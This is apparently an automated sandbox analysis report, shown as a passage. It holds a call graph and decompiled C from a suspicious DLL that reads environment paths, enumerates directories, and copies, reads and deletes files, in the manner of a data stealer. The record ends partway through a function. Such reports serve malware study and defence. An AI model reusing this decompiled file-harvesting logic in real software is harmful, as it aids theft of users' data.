4851->4849 4855 10004815 4852->4855 4856 10005b7a _abort 19 API calls 4855->4856 4859 1000482c 4856->4859 4857 10002ada _ValidateLocalCookies 4 API calls 4858 10004811 4857->4858 4858->4849 4859->4857 4860 10007c19 4861 10005af6 _abort 35 API calls 4860->4861 4862 10007c24 4861->4862 4863 10007a00 __fassign 35 API calls 4862->4863 4864 10007c34 4863->4864 4865 10004a9a 4868 10005411 4865->4868 4869 1000541d 4868->4869 4870 10005af6 _abort 35 API calls 4869->4870 4873 10005422 4870->4873 4871 100055a8 _abort 35 API calls 4872 1000544c 4871->4872 4873->4871 4141 10001c5b 4142 10001c6b ___scrt_fastfail 4141->4142 4145 100012ee 4142->4145 4144 10001c87 4146 10001324 ___scrt_fastfail 4145->4146 4147 100013b7 GetEnvironmentVariableW 4146->4147 4171 100010f1 4147->4171 4150 100010f1 56 API calls 4151 10001465 4150->4151 4152 100010f1 56 API calls 4151->4152 4153 10001479 4152->4153 4154 100010f1 56 API calls 4153->4154 4155 1000148d 4154->4155 4156 100010f1 56 API calls 4155->4156 4157 100014a1 4156->4157 4158 100010f1 56 API calls 4157->4158 4159 100014b5 lstrlenW 4158->4159 4160 100014d9 lstrlenW 4159->4160 4161 100014d2 4159->4161 4162 100010f1 56 API calls 4160->4162 4161->4144 4163 10001501 lstrlenW lstrcatW 4162->4163 4164 100010f1 56 API calls 4163->4164 4165 10001539 lstrlenW lstrcatW 4164->4165 4166 100010f1 56 API calls 4165->4166 4167 1000156b lstrlenW lstrcatW 4166->4167 4168 100010f1 56 API calls 4167->4168 4169 1000159d lstrlenW lstrcatW 4168->4169 4170 100010f1 56 API calls 4169->4170 4170->4161 4172 10001118 ___scrt_fastfail 4171->4172 4173 10001129 lstrlenW 4172->4173 4184 10002c40 4173->4184 4175 10001148 lstrcatW lstrlenW 4176 10001177 lstrlenW FindFirstFileW 4175->4176 4177 10001168 lstrlenW 4175->4177 4178 100011a0 4176->4178 4179 100011e1 4176->4179 4177->4176 4180 100011c7 FindNextFileW 4178->4180 4183 100011aa 4178->4183 4179->4150 4180->4178 4182 100011da FindClose 4180->4182 4182->4179 4183->4180 4186 10001000 4183->4186 4185 10002c57 4184->4185 4185->4175 4185->4185 4187 10001022 ___scrt_fastfail 4186->4187 4188 100010af 4187->4188 4189 1000102f lstrcatW lstrlenW 4187->4189 4192 100010b5 lstrlenW 4188->4192 4202 100010ad 4188->4202 4190 1000105a lstrlenW 4189->4190 4191 1000106b lstrlenW 4189->4191 4190->4191 4203 10001e89 lstrlenW 4191->4203 4217 10001e16 4192->4217 4195 10001088 GetFileAttributesW 4198 1000109c 4195->4198 4195->4202 4196 100010ca 4197 10001e89 5 API calls 4196->4197 4196->4202 4199 100010df 4197->4199 4198->4202 4209 1000173a 4198->4209 4222 100011ea 4199->4222 4202->4183 4204 10002c40 ___scrt_fastfail 4203->4204 4205 10001ea7 lstrcatW lstrlenW 4204->4205 4206 10001ed1 lstrcatW 4205->4206 4207 10001ec2 4205->4207 4206->4195 4207->4206 4208 10001ec7 lstrlenW 4207->4208 4208->4206 4210 10001747 ___scrt_fastfail 4209->4210 4237 10001cca 4210->4237 4213 1000199f 4213->4202 4215 10001824 ___scrt_fastfail _strlen 4215->4213 4257 100015da 4215->4257 4218 10001e29 4217->4218 4221 10001e4c 4217->4221 4219 10001e2d lstrlenW 4218->4219 4218->4221 4220 10001e3f lstrlenW 4219->4220 4219->4221 4220->4221 4221->4196 4223 1000120e ___scrt_fastfail 4222->4223 4224 10001e89 5 API calls 4223->4224 4225 10001220 GetFileAttributesW 4224->4225 4226 10001235 4225->4226 4227 10001246 4225->4227 4226->4227 4229 1000173a 34 API calls 4226->4229 4228 10001e89 5 API calls 4227->4228 4230 10001258 4228->4230 4229->4227 4231 100010f1 55 API calls 4230->4231 4232 1000126d 4231->4232 4233 10001e89 5 API calls 4232->4233 4234 1000127f ___scrt_fastfail 4233->4234 4235 100010f1 55 API calls 4234->4235 4236 100012e6 4235->4236 4236->4202 4238 10001cf1 ___scrt_fastfail 4237->4238 4239 10001d0f CopyFileW CreateFileW 4238->4239 4240 10001d44 DeleteFileW 4239->4240 4241 10001d55 GetFileSize 4239->4241 4246 10001808 4240->4246 4242 10001ede 21 API calls 4241->4242 4243 10001d66 ReadFile 4242->4243 4244 10001d94 CloseHandle DeleteFileW 4243->4244 4245 10001d7d CloseHandle DeleteFileW 4243->4245 4244->4246 4245->4246 4246->4213 4247 10001ede 4246->4247 4249 1000222f 4247->4249 4250 1000224e 4249->4250 4253 10002250 4249->4253 4265 1000474f 4249->4265 4270 100047e5 4249->4270 4250->4215 4252 10002908 4254 100035d2 __CxxThrowException@8 RaiseException 4252->4254 4253->4252 4277 100035d2 4253->4277 4256 10002925 4254->4256 4256->4215 4258 1000160c _strcat _strlen 4257->4258 4259 1000163c lstrlenW 4258->4259 4363 10001c9d 4259->4363 4261 10001655 lstrcatW lstrlenW 4262 10001678 4261->4262 4263 10001693 ___scrt_fastfail 4262->4263 4264 1000167e lstrcatW 4262->4264 4263->4215 4264->4263 4280 10004793 4265->4280 4268 1000478f 4268->4249 4269 10004765 4286 10002ada 4269->4286 4272 100056d0 _abort 4270->4272 4271 1000570e 4297 10006368 4271->4297 4272->4271 4273 100056f9 RtlAllocateHeap 4272->4273 4276 1000474f _abort 6 API calls 4272->4276 4273->4272 4275 1000570c 4273->4275 4275->4249 4276->4272 4279 100035f2 RaiseException 4277->4279 4279->4252 4281 1000479f ___DestructExceptionObject 4280->4281 4291 10005671 RtlEnterCriticalSection 4281->4291 4283 100047aa 4292 100047dc 4283->4292 4285 100047d1 _abort 4285->4269 4287 10002ae3 4286->4287 4288 10002ae5 4286->4288 4287->4268 4296 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 4288->4296 4290 10002c3b 4290->4268 4291->4283 4295 100056b9 RtlLeaveCriticalSection 4292->4295 4294 100047e3 4294->4285 4295->4294 4296->4290 4300 10005b7a GetLastError 4297->4300 4301 10005b93 4300->4301 4302 10005b99 4300->4302 4319 10005e08 4301->4319 4306 10005bf0 SetLastError 4302->4306 4326 1000637b 4302->4326 4308 10005bf9 4306->4308 4308->4275 4311 10005bb9 4314 10005be7 SetLastError 4311->4314 4312 10005bb3 4333 1000571e 4312->4333 4313 10005bcf 4346 1000593c 4313->4346 4314->4308 4317 1000571e _free 16 API calls 4318 10005be0 4317->4318 4318->4306 4318->4314 4351 10005c45 4319->4351 4321 10005e2f 4322 10005e47 TlsGetValue 4321->4322 4323 10005e3b 4321->4323 4322->4323 4324 10002ada _ValidateLocalCookies 4 API calls 4323->4324 4325 10005e58 4324->4325 4325->4302 4331 10006388 _abort 4326->4331 4327 100063c8 4330 10006368 _free 18 API calls 4327->4330 4328 100063b3 RtlAllocateHeap 4329 10005bab 4328->4329 4328->4331 4329->4312 4339 10005e5e 4329->4339 4330->4329 4331->4327 4331->4328 4332 1000474f _abort 6 API calls 4331->4332 4332->4331 4334 10005729 HeapFree 4333->4334 4338 10005752 _free 4333->4338 4335 1000573e 4334->4335 4334->4338 4336 10006368 _free 17 API calls 4335->4336 4337 10005744 GetLastError 4336->4337 4337->4338 4338->4311 4340 10005c45 _abort 5 API calls 4339->4340 4341 10005e85 4340->4341 4342 10005ea0 TlsSetValue 4341->4342 4343 10005e94 4341->4343 4342->4343 4344 10002ada _ValidateLocalCookies 4 API calls 4343->4344 4345 10005bc8 4344->4345 4345->4312 4345->4313 4357 10005914 4346->4357 4354 10005c71 4351->4354 4356 10005c75 __crt_fast_encode_pointer 4351->4356 4352 10005c95 4355 10005ca1 GetProcAddress 4352->4355 4352->4356 4353 10005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 4353->4354 4354->4352 4354->4353 4354->4356 4355->4356 4356->4321 4358 10005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 4357->4358 4359 10005938 4358->4359 4360 100058c4 4359->4360 4361 10005758 _abort 19 API calls 4360->4361 4362 100058e8 4361->4362 4362->4317 4364 10001ca6 _strlen 4363->4364 4364->4261 5401 100020db 5404 100020e7 ___DestructExceptionObject 5401->5404 5402 100020f6 5403 10002110 dllmain_raw 5403->5402 5405 1000212a 5403->5405 5404->5402 5404->5403 5407 1000210b 5404->5407 5414 10001eec 5405->5414 5407->5402 5408 10002177 5407->5408 5411 10001eec 29 API calls 5407->5411 5408->5402 5409 10001eec 29 API calls 5408->5409 5410 1000218a 5409->5410 5410->5402 5412 10002193 dllmain_raw 5410->5412 5413 1000216d dllmain_raw 5411->5413 5412->5402 5413->5408 5415 10001ef7 5414->5415 5416 10001f2a dllmain_crt_process_detach 5414->5416 5417 10001f12 5415->5417 5418 10001f01 5415->5418 5420 10001f06 5415->5420 5416->5420 5427 100023ec 5417->5427 5418->5420 5422 1000240b 5418->5422 5420->5407 5435 100053e5 5422->5435 5528 10003513 5427->5528 5432 10002408 5432->5420 5433 1000351e 7 API calls 5434 100023f5 5433->5434 5434->5420 5441 10005aca 5435->5441 5438 1000351e 5517 10003820 5438->5517 5440 10002415 5440->5420 5442 10005ad4 5441->5442 5443 10002410 5441->5443 5444 10005e08 _abort 10 API calls 5442->5444 5443->5438 5445 10005adb 5444->5445 5445->5443 5446 10005e5e _abort 10 API calls 5445->5446 5447 10005aee 5446->5447 5449 100059b5 5447->5449 5450 100059c0 5449->5450 5451 100059d0 5449->5451 5455 100059d6 5450->5455 5451->5443 5454 1000571e _free 19 API calls 5454->5451 5456 100059ef 5455->5456 5457 100059e9 5455->5457 5459 1000571e _free 19 API calls 5456->5459 5458 1000571e _free 19 API calls 5457->5458 5458->5456 5460 100059fb 5459->5460 5461 1000571e _free 19 API calls 5460->5461 5462 10005a06 5461->5462 5463 1000571e _free 19 API calls 5462->5463 5464 10005a11 5463->5464 5465 1000571e _free 19 API calls 5464->5465 5466 10005a1c 5465->5466 5467 1000571e _free 19 API calls 5466->5467 5468 10005a27 5467->5468 5469 1000571e _free 19 API calls 5468->5469 5470 10005a32 5469->5470 5471 1000571e _free 19 API calls 5470->5471 5472 10005a3d 5471->5472 5473 1000571e _free 19 API calls 5472->5473 5474 10005a48 5473->5474 5475 1000571e _free 19 API calls 5474->5475 5476 10005a56 5475->5476 5481 1000589c 5476->5481 5487 100057a8 5481->5487 5483 100058c0 5484 100058ec 5483->5484 5500 10005809 5484->5500 5486 10005910 5486->5454 5488 100057b4 ___DestructExceptionObject 5487->5488 5495 10005671 RtlEnterCriticalSection 5488->5495 5490 100057be 5493 1000571e _free 19 API calls 5490->5493 5494 100057e8 5490->5494 5492 100057f5 _abort 5492->5483 5493->5494 5496 100057fd 5494->5496 5495->5490 5499 100056b9 RtlLeaveCriticalSection 5496->5499 5498 10005807 5498->5492 5499->5498 5501 10005815 ___DestructExceptionObject 5500->5501 5508 10005671 RtlEnterCriticalSection 5501->5508 5503 1000581f 5509 10005a7f 5503->5509 5505 10005832 5513 10005848 5505->5513 5507 10005840 _abort 5507->5486 5508->5503 5510 10005ab5 __fassign 5509->5510 5511 10005a8e __fassign 5509->5511 5510->5505 5511->5510 5512 10007cc2 __fassign 19 API calls 5511->5512 5512->5510 5516 100056b9 RtlLeaveCriticalSection 5513->5516 5515 10005852 5515->5507 5516->5515 5518 1000382d 5517->5518 5522 1000384b ___vcrt_freefls@4 5517->5522 5519 1000383b 5518->5519 5523 10003b67 5518->5523 5521 10003ba2 ___vcrt_FlsSetValue 6 API calls 5519->5521 5521->5522 5522->5440 5524 10003a82 try_get_function 5 API calls 5523->5524 5525 10003b81 5524->5525 5526 10003b99 TlsGetValue 5525->5526 5527 10003b8d 5525->5527 5526->5527 5527->5519 5534 10003856 5528->5534 5530 100023f1 5530->5434 5531 100053da 5530->5531 5532 10005b7a _abort 19 API calls 5531->5532 5533 100023fd 5532->5533 5533->5432 5533->5433 5535 10003862 GetLastError 5534->5535 5536 1000385f 5534->5536 5537 10003b67 ___vcrt_FlsGetValue 6 API calls 5535->5537 5536->5530 5538 10003877 5537->5538 5539 10003896 5538->5539 5540 100038dc SetLastError 5538->5540 5541 10003ba2 ___vcrt_FlsSetValue 6 API calls 5538->5541 5539->5540 5540->5530 5542 10003890 5541->5542 5542->5539 5543 100038b8 5542->5543 5545 10003ba2 ___vcrt_FlsSetValue 6 API calls 5542->5545 5543->5539 5544 10003ba2 ___vcrt_FlsSetValue 6 API calls 5543->5544 5544->5539 5545->5543 4874 1000281c 4877 10002882 4874->4877 4880 10003550 4877->4880 4879 1000282a 4881 1000355d 4880->4881 4884 1000358a 4880->4884 4882 100047e5 ___std_exception_copy 20 API calls 4881->4882 4881->4884 4883 1000357a 4882->4883 4883->4884 4886 1000544d 4883->4886 4884->4879 4887 1000545a 4886->4887 4888 10005468 4886->4888 4887->4888 4890 1000547f 4887->4890 4889 10006368 _free 19 API calls 4888->4889 4894 10005470 4889->4894 4892 1000547a 4890->4892 4893 10006368 _free 19 API calls 4890->4893 4891 100062ac _abort 24 API calls 4891->4892 4892->4884 4893->4894 4894->4891 5546 10004bdd 5547 10004c08 5546->5547 5548 10004bec 5546->5548 5550 10006d60 48 API calls 5547->5550 5548->5547 5549 10004bf2 5548->5549 5551 10006368 _free 19 API calls 5549->5551 5552 10004c0f GetModuleFileNameA 5550->5552 5553 10004bf7 5551->5553 5555 10004c33 5552->5555 5554 100062ac _abort 24 API calls 5553->5554 5556 10004c01 5554->5556 5569 10004d01 5555->5569 5561 10004c72 5564 10004d01 35 API calls 5561->5564 5562 10004c66 5563 10006368 _free 19 API calls 5562->5563 5568 10004c6b 5563->5568 5566 10004c88 5564->5566 5565 1000571e _free 19 API calls 5565->5556 5567 1000571e _free 19 API calls 5566->5567 5566->5568 5567->5568 5568->5565 5571 10004d26 5569->5571 5573 10004d86 5571->5573 5581 100070eb 5571->5581 5572 10004c50 5575 10004e76 5572->5575 5573->5572 5574 100070eb 35 API calls 5573->5574 5574->5573 5576 10004e8b 5575->5576 5577 10004c5d 5575->5577 5576->5577 5578 1000637b _abort 19 API calls 5576->5578 5577->5561 5577->5562 5579 10004eb9 5578->5579 5580 1000571e _free 19 API calls 5579->5580 5580->5577 5584 10007092 5581->5584 5585 100054a7 __fassign 35 API calls 5584->5585 5586 100070a6 5585->5586 5586->5571 4895 10008c9e RtlLeaveCriticalSection 4896 100081a0 4897 100081d9 4896->4897 4898 100081dd 4897->4898 4909 10008205 4897->4909 4899 10006368 _free 19 API calls 4898->4899 4901 100081e2 4899->4901 4900 10008529 4902 10002ada _ValidateLocalCookies 4 API calls 4900->4902 4903 100062ac _abort 24 API calls 4901->4903 4904 10008536 4902->4904 4905 100081ed 4903->4905 4906 10002ada _ValidateLocalCookies 4 API calls 4905->4906 4907 100081f9 4906->4907 4909->4900 4910 100080c0 4909->4910 4913 100080db 4910->4913 4911 10002ada _ValidateLocalCookies 4 API calls 4912 10008152 4911->4912 4912->4909 4913->4911 4913->4913 5587 10007260 GetStartupInfoW 5588 10007286 5587->5588 5589 10007318 5587->5589 5588->5589 5590 10008be3 25 API calls 5588->5590 5591 100072af 5590->5591 5591->5589 5592 100072dd GetFileType 5591->5592 5592->5591 4914 100021a1 ___scrt_dllmain_exception_filter 4915 100078a3 4916 100078cb 4915->4916 4917 10002ada _ValidateLocalCookies 4 API calls 4916->4917 4918 100078e8 4917->4918 5593 100079e6 5596 100078ec 5593->5596 5597 100078fd 5596->5597 5600 10007909 5596->5600 5598 100054a7 __fassign 35 API calls 5597->5598 5597->5600 5599 10007929 5598->5599 5599->5600 5608 10008fa0 5599->5608 5603 1000799d MultiByteToWideChar 5603->5600 5605 1000798d 5603->5605 5604 1000795d 5604->5605 5607 1000796b MultiByteToWideChar 5604->5607 5605->5600 5606 10006368 _free 19 API calls 5605->5606 5606->5600 5607->5600 5607->5605 5609 100054a7 __fassign 35 API calls 5608->5609 5610 10007957 5609->5610 5610->5603 5610->5604 4919 1000742b 4920 10007430 4919->4920 4922 10007453 4920->4922 4923 10008bae 4920->4923 4924 10008bdd 4923->4924 4925 10008bbb 4923->4925 4924->4920 4926 10008bd7 4925->4926 4927 10008bc9 RtlDeleteCriticalSection 4925->4927 4928 1000571e _free 19 API calls 4926->4928 4927->4926 4927->4927 4928->4924 4929 100060ac 4930 100060dd 4929->4930 4932 100060b7 4929->4932 4931 100060c7 FreeLibrary 4931->4932 4932->4930 4932->4931 5611 1000506f 5612 10005081 5611->5612 5613 10005087 5611->5613 5614 10005000 19 API calls 5612->5614 5614->5613 4933 10005630 4935 1000563b 4933->4935 4934 10005eb7 10 API calls 4934->4935 4935->4934 4936 10005664 4935->4936 4937 10005660 4935->4937 4939 10005688 4936->4939 4940 100056b4 4939->4940 4941 10005695 4939->4941 4940->4937 4942 1000569f RtlDeleteCriticalSection 4941->4942 4942->4940 4942->4942 5615 10003370 5626 10003330 5615->5626 5627 10003342 5626->5627 5628 1000334f 5626->5628 5629 10002ada _ValidateLocalCookies 4 API calls 5627->5629 5629->5628 5630 100063f0 5631 10006400 5630->5631 5632 10006416 5630->5632 5633 10006368 _free 19 API calls 5631->5633 5640 10006561 5632->5640 5643 10006480 5632->5643 5649 10006580 5632->5649 5634 10006405 5633->5634 5636 100062ac _abort 24 API calls 5634->5636 5635 10004e76 19 API calls 5641 100064e5 5635->5641 5644 1000640f 5636->5644 5638 100064ee 5639 1000571e _free 19 API calls 5638->5639 5639->5640 5669 1000679a 5640->5669 5641->5638 5641->5641 5646 10006573 5641->5646 5660 100085eb 5641->5660 5643->5635 5647 100062bc _abort 9 API calls 5646->5647 5648 1000657f 5647->5648 5650 1000658c 5649->5650 5650->5650 5651 1000637b _abort 19 API calls 5650->5651 5652 100065ba 5651->5652 5653 100085eb 24 API calls 5652->5653 5654 100065e6 5653->5654 5655 100062bc _abort 9 API calls 5654->5655 5656 10006615 ___scrt_fastfail 5655->5656 5657 100066b6 FindFirstFileExA 5656->5657 5658 10006705 5657->5658 5659 10006580 24 API calls 5658->5659 5661 1000853a 5660->5661 5663 10008554 5661->5663 5665 1000854f 5661->5665 5667 1000858b 5661->5667 5662 10006368 _free 19 API calls 5664 1000857a 5662->5664 5663->5641 5666 100062ac _abort 24 API calls 5664->5666 5665->5662 5665->5663 5666->5663 5667->5663 5668 10006368 _free 19 API calls 5667->5668 5668->5664 5670 100067a4 5669->5670 5671 100067b4 5670->5671 5672 1000571e _free 19 API calls 5670->5672 5673 1000571e _free 19 API calls 5671->5673 5672->5670 5674 100067bb 5673->5674 5674->5644 4947 10006332 4952 10006355 4947->4952 4949 1000633d _free 4950 10006368 _free 19 API calls 4949->4950 4951 10006350 4950->4951 4953 10005b7a _abort 19 API calls 4952->4953 4954 1000635a 4953->4954 4954->4949 4955 10003eb3 4956 10005411 35 API calls 4955->4956 4957 10003ebb 4956->4957 5675 10008c7b RtlEnterCriticalSection 4958 10008dbc 4959 10008dd6 4958->4959 4960 10008dc9 4958->4960 4962 10008de2 4959->4962 4963 10006368 _free 19 API calls 4959->4963 4961 10006368 _free 19 API calls 4960->4961 4964 10008dce 4961->4964 4965 10008e03 4963->4965 4966 100062ac _abort 24 API calls 4965->4966 4966->4964 4967 1000543d 4968 10005440 4967->4968 4969 100055a8 _abort 35 API calls 4968->4969 4970 1000544c 4969->4970 4971 100067bf 4976 100067f4 4971->4976 4974 100067db 4975 1000571e _free 19 API calls 4975->4974 4977 100067cd 4976->4977 4978 10006806 4976->4978 4977->4974 4977->4975 4979 10006836 4978->4979 4980 1000680b 4978->4980 4979->4977 4987 100071d6 4979->4987 4981 1000637b _abort 19 API calls 4980->4981 4983 10006814 4981->4983 4985 1000571e _free 19 API calls 4983->4985 4984 10006851 4986 1000571e _free 19 API calls 4984->4986 4985->4977 4986->4977 4988 100071e1 4987->4988 4989 100071fa 4988->4989 4990 10007209 4988->4990 4992 10006368 _free 19 API calls 4989->4992 4991 10007218 4990->4991 4996 10008a98 4990->4996 5003 10008acb 4991->5003 4995 100071ff ___scrt_fastfail 4992->4995 4995->4984 4997 10008aa3 4996->4997 4998 10008ab8 RtlSizeHeap 4996->4998 4999 10006368 _free 19 API calls 4997->4999 4998->4991 5000 10008aa8 4999->5000 5001 100062ac _abort 24 API calls 5000->5001 5002 10008ab3 5001->5002 5002->4991 5004 10008ae3 5003->5004 5005 10008ad8 5003->5005 5007 10008aeb 5004->5007 5013 10008af4 _abort 5004->5013 5006 100056d0 20 API calls 5005->5006 5011 10008ae0 5006->5011 5008 1000571e _free 19 API calls 5007->5008 5008->5011 5009 10008af9 5012 10006368 _free 19 API calls 5009->5012 5010 10008b1e RtlReAllocateHeap 5010->5011 5010->5013 5011->4995 5012->5011 5013->5009 5013->5010 5014 1000474f _abort 6 API calls 5013->5014 5014->5013 5676 10005bff 5684 10005d5c 5676->5684 5679 10005c13 5680 10005b7a _abort 19 API calls 5681 10005c1b 5680->5681 5682 10005c28 5681->5682 5683 10005c2b 10 API calls 5681->5683 5683->5679 5685 10005c45 _abort 5 API calls 5684->5685 5686 10005d83 5685->5686 5687 10005d9b TlsAlloc 5686->5687 5688 10005d8c 5686->5688 5687->5688 5689 10002ada _ValidateLocalCookies 4 API calls 5688->5689 5690 10005c09 5689->5690 5690->5679 5690->5680

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E100010F1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				struct _WIN32_FIND_DATAW _v596;
                                                                                                                                                                                                                                                                  				short _v1116;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				signed int _t40;
                                                                                                                                                                                                                                                                  				signed int _t42;
                                                                                                                                                                                                                                                                  				void* _t45;
                                                                                                                                                                                                                                                                  				int _t48;
                                                                                                                                                                                                                                                                  				signed int _t53;
                                                                                                                                                                                                                                                                  				void* _t55;
                                                                                                                                                                                                                                                                  				void* _t58;
                                                                                                                                                                                                                                                                  				short _t59;
                                                                                                                                                                                                                                                                  				short _t61;
                                                                                                                                                                                                                                                                  				WCHAR* _t65;
                                                                                                                                                                                                                                                                  				void* _t69;
                                                                                                                                                                                                                                                                  				signed int _t71;
                                                                                                                                                                                                                                                                  				void* _t75;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t65 = __edx;
                                                                                                                                                                                                                                                                  				_t55 = __ecx;
                                                                                                                                                                                                                                                                  				E10002C40(__edx,  &_v596, 0, 0x250);
                                                                                                                                                                                                                                                                  				E10002C40(_t65,  &_v1116, 0, 0x208);
                                                                                                                                                                                                                                                                  				E10002C40(_t65,  &_v1116, 0, lstrlenW( &_v1116) + _t33);
                                                                                                                                                                                                                                                                  				_t75 = (_t71 & 0xfffffff8) - 0x45c + 0x24;
                                                                                                                                                                                                                                                                  				lstrcatW( &_v1116, _t65);
                                                                                                                                                                                                                                                                  				_t40 = lstrlenW( &_v1116);
                                                                                                                                                                                                                                                                  				_t58 = 0x5c;
                                                                                                                                                                                                                                                                  				if( *((intOrPtr*)(_t75 + 0xe + _t40 * 2)) != _t58) {
                                                                                                                                                                                                                                                                  					_t53 = lstrlenW( &_v1116);
                                                                                                                                                                                                                                                                  					_t61 = 0x5c;
                                                                                                                                                                                                                                                                  					 *((short*)(_t75 + 0x10 + _t53 * 2)) = _t61;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t42 = lstrlenW( &_v1116);
                                                                                                                                                                                                                                                                  				_t59 = 0x2a;
                                                                                                                                                                                                                                                                  				 *((short*)(_t75 + 0x10 + _t42 * 2)) = _t59;
                                                                                                                                                                                                                                                                  				_t45 = FindFirstFileW( &_v1116,  &_v596); // executed
                                                                                                                                                                                                                                                                  				_t69 = _t45;
                                                                                                                                                                                                                                                                  				if(_t69 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						if((_v596.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                  							E10001000(_t55, _t55, _t65,  &(_v596.cFileName), _a4, _a8, _a12);
                                                                                                                                                                                                                                                                  							_t75 = _t75 + 0x10;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t48 = FindNextFileW(_t69,  &_v596); // executed
                                                                                                                                                                                                                                                                  					} while (_t48 != 0);
                                                                                                                                                                                                                                                                  					FindClose(_t69);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return 0;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x1000110f
                                                                                                                                                                                                                                                                  0x10001111
                                                                                                                                                                                                                                                                  0x10001113
                                                                                                                                                                                                                                                                  0x10001124
                                                                                                                                                                                                                                                                  0x10001143
                                                                                                                                                                                                                                                                  0x10001148
                                                                                                                                                                                                                                                                  0x10001151
                                                                                                                                                                                                                                                                  0x1000115c
                                                                                                                                                                                                                                                                  0x10001160
                                                                                                                                                                                                                                                                  0x10001166
                                                                                                                                                                                                                                                                  0x1000116d
                                                                                                                                                                                                                                                                  0x10001171
                                                                                                                                                                                                                                                                  0x10001172
                                                                                                                                                                                                                                                                  0x10001172
                                                                                                                                                                                                                                                                  0x1000117c
                                                                                                                                                                                                                                                                  0x10001180
                                                                                                                                                                                                                                                                  0x10001181
                                                                                                                                                                                                                                                                  0x10001193
                                                                                                                                                                                                                                                                  0x10001199
                                                                                                                                                                                                                                                                  0x1000119e
                                                                                                                                                                                                                                                                  0x100011a0
                                                                                                                                                                                                                                                                  0x100011a8
                                                                                                                                                                                                                                                                  0x100011bf
                                                                                                                                                                                                                                                                  0x100011c4
                                                                                                                                                                                                                                                                  0x100011c4
                                                                                                                                                                                                                                                                  0x100011d0
                                                                                                                                                                                                                                                                  0x100011d6
                                                                                                                                                                                                                                                                  0x100011db
                                                                                                                                                                                                                                                                  0x100011db
                                                                                                                                                                                                                                                                  0x100011e9

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1083526818-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9ca1b0116ed442476f8ca3ba05748bc122b066834aaa8ac708874ce801715846
                                                                                                                                                                                                                                                                  • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ca1b0116ed442476f8ca3ba05748bc122b066834aaa8ac708874ce801715846
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E100012EE(void* __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                  				void _v40;
                                                                                                                                                                                                                                                                  				short _v42;
                                                                                                                                                                                                                                                                  				short _v44;
                                                                                                                                                                                                                                                                  				short _v46;
                                                                                                                                                                                                                                                                  				short _v48;
                                                                                                                                                                                                                                                                  				short _v50;
                                                                                                                                                                                                                                                                  				short _v52;
                                                                                                                                                                                                                                                                  				short _v54;
                                                                                                                                                                                                                                                                  				short _v56;
                                                                                                                                                                                                                                                                  				short _v58;
                                                                                                                                                                                                                                                                  				short _v60;
                                                                                                                                                                                                                                                                  				short _v62;
                                                                                                                                                                                                                                                                  				short _v64;
                                                                                                                                                                                                                                                                  				short _v66;
                                                                                                                                                                                                                                                                  				short _v68;
                                                                                                                                                                                                                                                                  				short _v588;
